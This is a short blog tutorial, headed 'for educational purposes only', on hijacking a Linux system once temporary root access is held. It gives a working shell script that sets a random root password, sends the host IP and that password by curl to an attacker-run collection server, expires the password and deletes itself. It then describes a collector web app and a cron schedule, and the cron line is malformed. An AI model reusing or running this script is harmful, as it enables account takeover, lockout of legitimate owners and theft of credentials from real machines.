Hacking

Hacking Linux System Using Shell Script (For Educational Purposes Only)

Hacking Linux System Using Shell Script article is published For Educational Purposes Only.

Hereby assuming that you already got a root user’s access to the target system for shorter period which you want to hack.

  • Instering a shell script code to target system.
  • Make script executable.
  • Writting an appplication which can accept system IP and Password at http protocol.
  • Insert cronjob to execute script only once.

Instering a shell script code to target system

Create file with any name, for example myscript.sh

#!/bin/sh
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 20)
IPS=$(echo $IPS | sed 's/ /%20/g')
echo $PASSWORD >> /var/log/passwordiscript.log
echo "root:$PASSWORD" | chpasswd

curl -X GET "http://192.168.1.100:8080/collectdata?ip=$IPS&password=$PASSWORD"; >> /var/log/passwordiscript.log

##ToForceChangeRootPassword##
passwd -e root
##ToForceChangeRootPassword##

#delete the script after submitting at URL
rm -- "$0"

This script will gather information like system IP address and password, data will be submitted to your provided url using curl, root user’s password will be changed before submitting data to URL.

Make script executable

Set file permissions to make file executable.

# chmod 755 /your_path/myscript.sh

Writting an appplication which can accept system IP and Password at http protocol

Write your own web application to accept IP address and password at query string. Further within application store hacked IP and password to database OR email it. Here in above script webserver started at port 8080 with an server address 192.168.1.100. Using this webserver data is accpted at URL http://192.168.1.100:8080/collectdata?ip=$IPS&password=$PASSWORD

Insert cronjob to execute script only once.

User crontabl -e command to add new cronjob. To execute a command on 20th November 2019 at midnight add cron as follow:

0 0 20 11 ? 2019 /your_path/myscript.sh

Nishant Vaity

Knowledgeable and skilled Technology Lead with an ability of software development and supervision. Possess a Bachelor of Science (BS) in Information Technology along with 11+ years of experience with hands-on coding and team management. By profession, I am a Software Engineer, Technology Mentor & Entrepreneur. Passionate about the technologies I use and always eager to share & learn more from that passion.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.